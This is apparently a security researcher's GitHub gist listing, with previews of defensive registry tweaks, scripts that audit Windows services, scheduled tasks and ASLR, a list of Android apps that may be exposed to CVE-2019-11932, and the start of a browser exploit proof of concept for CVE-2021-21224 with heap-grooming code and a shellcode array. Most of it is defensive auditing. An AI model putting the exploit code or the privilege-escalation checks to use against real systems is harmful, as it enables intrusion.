wdormann wdormann
wdormann
/ noappinstaller.reg
Last active
December 14, 2021 00:30
Prevent the ability to click on a ms-appinstaller: URI for the current user
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Classes\ms-appinstaller] | |
| "URL Protocol"=- |
wdormann
/ checksvc-lpe.py
Created
November 23, 2021 14:27
Python script to check for explicitly privileged services that are controllable by non-admin users
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import subprocess | |
| import ctypes | |
| # See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/ | |
| svcinfo = {} | |
| #nonadmin = ['AU', 'AN', 'BG', 'BU', 'DG', 'WD', 'IU', 'LG'] | |
| nonadmin = ['AU', 'AN', 'BG', 'BU', 'DG', 'IU', 'LG'] | |
| FNULL = open(os.devnull, 'w') |
wdormann
/ CVE-2021-21224.html
Last active
October 31, 2022 22:01
Sample ARM64 PoC for CVE-2021-21224
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function gc() { | |
| for (var i = 0; i < 0x80000; ++i) { | |
| var a = new ArrayBuffer(); | |
| } | |
| } | |
| let shellcode = [ | |
| // Move x18 to x28 (TEB) |
wdormann
/ privtasks.ps1
Last active
August 15, 2023 15:15
List privileged scheduled tasks that don't come with Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()) | |
| if (-Not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { | |
| Write-Warning "We don't have elevated privileges. The following results may not be complete." | |
| } | |
| schtasks /query /fo csv -v | ConvertFrom-Csv | ? {$_.Status -notlike "Disabled" -and $_.TaskName -notlike "\Microsoft\Windows\*" -and $_.TaskName -notlike "\Microsoft\Office\*" -and $_.TaskName -notlike "\Microsoft\XblGameSave\*" -and $_.TaskName -notlike "TaskName" -and ($_."Run As User" -like "*system" -or $_."Run As User" -like "Administrator*")} | fl taskname,"Comment","Task To Run","Run As User" |
wdormann
/ privileged.ps1
Last active
May 9, 2024 17:42
List privileged services that don't come with Windows 10 VMware guest
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $win10_builtin = @('AppVClient', 'ClickToRunSvc', 'COMSysApp', 'diagnosticshub.standardcollector.service', | |
| 'msiserver', 'ose', 'perceptionsimulation', 'SecurityHealthService', 'Sense', | |
| 'SensorDataService', 'SgrmBroker', 'Spooler', 'ssh-agent', 'TieringEngineService', | |
| 'TrustedInstaller', 'UevAgentService', 'vds', 'VSS', 'wbengine', 'WinDefend', 'wmiApSrv', | |
| 'WSearch', 'XboxNetApiSvc', 'XboxGipSvc', 'XblGameSave', 'XblAuthManager', 'WwanSvc', 'wuauserv', | |
| 'WwanSvc', 'wuauserv', 'WpnService', 'WPDBusEnum', 'WpcMonSvc', 'WManSvc', 'wlidsvc', 'WlanSvc', | |
| 'wisvc', 'Winmgmt', 'WiaRpc', 'WerSvc', 'wercplsupport', 'WdiSystemHost', 'WbioSrvc', 'WalletService', | |
| 'WaaSMedicSvc', 'vmvss', 'vmicvss', 'vmicvmsession', 'vmicshutdown', 'vmicrdv', 'vmickvpexchange', | |
| 'vmicheartbeat', 'vmicguestinterface', 'VaultSvc', 'UsoSvc', 'UserManager', 'UmRdpService', | |
| 'TroubleshootingSvc', 'TrkWks', 'TokenBroker', 'Themes', 'TabletInputService', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Don't use this version! | |
| # Try https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c instead | |
| # | |
| # Utility for listing SYSTEM-privileged scheduled tasks on Windows | |
| # Tasks that come with Windows 10 are not included. | |
| # Admin privileges are required to list all scheduled tasks. | |
| import csv | |
| import subprocess | |
| import tempfile |
wdormann
/ privileged.py
Last active
April 30, 2021 13:07
List privileged services that don't come with Windows 10 - deprecated
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # DON'T USE THIS VERSION! | |
| # Try https://gist.github.com/wdormann/89ed779933fe205fb52ecf3eacf5ff40 instead | |
| import os | |
| import subprocess | |
| # See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/ | |
| svcinfo = {} | |
| FNULL = open(os.devnull, 'w') |
wdormann
/ checkaslr.py
Last active
April 20, 2020 18:16
Check for running processes on Windows that have components that do not utilize ASLR
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ''' | |
| Utility to check for processes running with non-ASLR-compatible components. | |
| Run with Administrative privileges to get visibility into all processes. | |
| (1a) psutil: https://pypi.org/project/psutil/ | |
| Installed via PIP | |
| -OR- | |
| (1b) Sysinternals ListDLLs: https://docs.microsoft.com/en-us/sysinternals/downloads/listdlls |
wdormann
/ gist:874198c1bd29c7dd2157d9fc1d858263
Last active
August 31, 2025 20:01
List of Android apps that include libpl_droidsonroids_gif.so - potentially vulnerable to CVE-2019-11932. Sorted by install count.
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| com.whatsapp 1000000000 | |
| com.lenovo.anyshare.gps 1000000000 | |
| com.instagram.android 1000000000 | |
| com.zhiliaoapp.musically 500000000 | |
| com.viber.voip 500000000 | |
| wp.wattpad 100000000 | |
| vStudio.Android.Camera360 100000000 | |
| vsin.t16_funny_photo 100000000 | |
| com.yahoo.mobile.client.android.mail 100000000 | |
| com.xvideostudio.videoeditor 100000000 |
wdormann
/ disable_discimage.reg
Last active
August 11, 2024 21:55
Disable Windows Explorer file associations for Disc Image Mount (ISO, IMG, VHD, VHDX)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [-HKEY_CLASSES_ROOT\.iso] | |
| [-HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount\command] | |
| [-HKEY_CLASSES_ROOT\.img] | |
| [-HKEY_CLASSES_ROOT\.vhdx] |